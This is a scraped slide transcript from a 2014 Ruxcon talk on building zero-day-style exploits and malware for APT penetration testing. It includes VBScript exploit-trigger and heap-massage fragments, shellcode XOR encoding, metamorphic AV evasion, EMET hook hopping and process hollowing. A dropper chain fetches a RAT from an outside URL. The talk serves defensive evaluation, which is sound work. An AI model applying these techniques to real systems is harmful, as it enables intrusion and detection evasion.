Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... ·...
Transcript of Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... ·...
![Page 1: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/1.jpg)
Oct 12, 2014
Ruxcon 2014
![Page 2: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/2.jpg)
Sophos
Symantec
Westpac
FireEye
Kaspersky
Working on PhD at University of Federation
![Page 3: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/3.jpg)
Help discover vulnerable points of an enterprise using controlled near zero day APT
Evaluate zero day readiness (resiliency) of solutions deployed in enterprise security infrastructure
Create an easy-to-maintain attack platform for APT pen testing that addresses all aspects of the battle between attackers and defenders (i.e. anti-analysis and anti-detection)
![Page 4: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/4.jpg)
Create a sustainable model for APT penetration testing
Cost effectively evading corporate security infrastructure
Modular implementation of zero day exploits and malware
![Page 5: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/5.jpg)
Web Gateway, NIDS, NIPS
Spam Filter
Sandbox Security
SOE Patch Management
Endpoint Security
Internet
![Page 6: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/6.jpg)
Diversity – shuffling, randomisation, …
…And do it in easy way
![Page 7: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/7.jpg)
![Page 8: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/8.jpg)
APT Penetration Testing
![Page 9: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/9.jpg)
ROP
Shellcode
Heap Spray
Exploit Trigger
Dropper
RAT RAT Control C&C
Delivery
![Page 10: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/10.jpg)
![Page 11: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/11.jpg)
![Page 12: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/12.jpg)
ROP gadget can be customized for a given implementation (mona plugin and metasploit come in handy)
Understanding exploits (CVE details) Available DLLs
ASLR, other methods
ROP gadget
Metasploit module write-up
Evasion method Metamorphism
Include unnecessary API calls
Use of different APIs achieving the same goal
Hook hopping to bypass EMET
![Page 13: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/13.jpg)
For k = zero to underflow Step -1 RemoveEntry(k) Next Sub RemoveEntry(index) Dim a a = CLng(index) required_claims.remove(a)End Sub
For k = zero to underflow Step -1 required_claims.remove(CLng(k)) Next
![Page 14: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/14.jpg)
massage_array_length = 5493 Dim massage_array(5493) For i = zero to massage_array_length Set massage_array(i) = document.createElement("object") Next
![Page 15: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/15.jpg)
AV Evasion AV have signatures for shell code or heap spraying code?
AV execute JS in sandbox?
Strategy Encode shellcode with custom (or different) algorithm.
Rewrite the shellcode - using ROR/ROL/XOR to encrypt the main code and put decoding routine as prefix to shellcode.
Metamorphism on JS (Junk code).
Rewrite heap spraying module – bypass signatures, but most heuristics should be able to find it, even if it is encrypted/encoded/obfuscated? (finally you have to somehow allocate memory, eh :P )
![Page 16: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/16.jpg)
1st stage Decryption Simple XOR
Rolling XOR (Visual decrypt)
Polymorphic XOR (Office 2010 payload)
API Call Obfuscation API name hash
Hook Hopping
Dropper Download Various methods
![Page 17: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/17.jpg)
Exploit
exploit heapspray ROP shellcode PASS
√
√ √
√ √
√ √ √
√ √ √
√ √ √ √
…
![Page 18: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/18.jpg)
APT Penetration Testing
![Page 19: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/19.jpg)
Dropper
Trusted Windows Process
malicious 1. Launch
2. Inject/unpack
2nd stage binary
![Page 20: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/20.jpg)
Dropper
Trusted Windows Process
malicious
![Page 21: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/21.jpg)
![Page 22: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/22.jpg)
Metamorphism Fundamentals Simple Techniques
Adding varying lengths of NOP instructions
Permuting use registers
Adding useless instructions and loops
More Advanced Function reordering
Program flow modification
Static data structure modification
![Page 23: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/23.jpg)
Find out what’s wrong with this code. .text:0040C5E7 mov al, byte_41474C
.text:0040C5EC push 9BE3D3Ch
.text:0040C5F1 push offset aFreeze_handToD ; "Freeze_Hand to %d %d inish\n"
.text:0040C5F6 push eax
.text:0040C5F8 push ebx
.text:0040C5F9 push offset aPowerTxagccont ; "Power/TxAgcControllegal Module"
.text:0040C5FE call sub_40BF42
.text:0040C603 cmp esi, dword_4146C4
.text:0040C609 mov byte ptr [ebp+var_4], al
.text:0040C60C lea eax, [ebx-1E50h]
.text:0040C612 jle short loc_40C650
.text:0040C614 push 6Eh
.text:0040C61B push 0FFFFFFB7h
.text:0040C61D mov ebx, eax
.text:0040C61F call sub_41071F
![Page 24: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/24.jpg)
![Page 25: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/25.jpg)
APT Penetration Testing
![Page 26: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/26.jpg)
Obfuscation
Metamorphism
Polymorphism
![Page 27: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/27.jpg)
Memory Embedded encrypted malware PE files
Unpacked directly into target memory location
File/Registry Installs encrypted binaries into file or
registry
Consists of PE loader and malware PE files
Unpacked into target memory
![Page 28: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/28.jpg)
Decrypt PE loader and injects it into svchost or explorer
Process Hollowing Run svchost and write to process memory
OR
Run standard dynamic allocation/injection based stealth.
![Page 29: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/29.jpg)
HTTP Back Connect (Proxy/Firewall evasion)
Conditional activation depending on VM/Emulator presence (sandbox evasion)
Delayed execution (sandbox evasion)
![Page 30: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/30.jpg)
APT Penetration Testing
![Page 31: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/31.jpg)
Victim (Windows)
Attacker (Windows)
C&C(Linux)
1. Exploit
5. Remote Access
2. Drop
3. Register
4. Remote Access
![Page 32: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/32.jpg)
Many RATs have direct P2P communication.
Reasoning Static IP/DNS required for RAT to beacon out
Minimise exposure of attacker machine
Hiding in the cloud of C&Cs is safer
![Page 33: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/33.jpg)
![Page 34: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/34.jpg)
![Page 35: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/35.jpg)
GetTempPathA
URLDownloadToFileA
CreateFileA (Open encrypted file)
SetFilePointer
GetFileSize
VirtualAlloc
ReadFile
Decrypt
ReadFile
WriteFile
CloseHandle
HookHoppingWinExec = kernel32!WinExec+5
HookHoppingWinExec(stack_buffer)
![Page 36: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/36.jpg)
![Page 37: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/37.jpg)
2013-3893.asm
Rat.exe.bin Rat.exe
"http://aptpentest.com
/?f=Rat.exe.bin"
Genshell.py
xor.asm
2013-3893.s1
2013-3893.s2
2013-3893.s3
nasm
+
0x9C
nasm xor-0x9C.bin
+
raw2uni 2013-3893.uni
xor-0x95
![Page 38: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/38.jpg)
Assembly source (Use IDA export and some manual work)
![Page 39: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/39.jpg)
No PE header. Obfuscated as expected…
![Page 40: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/40.jpg)
![Page 41: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/41.jpg)
![Page 42: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/42.jpg)
xor-0x9C.bin
![Page 43: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/43.jpg)
![Page 44: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/44.jpg)
Binary Obfuscation
Packaged Injection Injector injects the main malware into svchost, explorer,
or web browser process.
Injector is separate from the main malware, allowing reuse of the core malware while staying undetected by modifying the injector code itself with minimum effort.
Injector needs to also unpack or decode the core malware (See McRat example) before injection.
![Page 45: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/45.jpg)
![Page 46: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/46.jpg)
![Page 47: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/47.jpg)
![Page 48: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/48.jpg)
![Page 49: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/49.jpg)
APT Penetration Testing Framework
![Page 50: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/50.jpg)
![Page 51: Oct 12, 2014 Ruxcon 20142014.ruxcon.org.au/assets/2014/slides/Writing Zero Days for Security... · Help discover vulnerable points of an enterprise using controlled near zero day](https://reader031.fdocuments.in/reader031/viewer/2022022808/5e1d2dbefe98ca1de379d4f2/html5/thumbnails/51.jpg)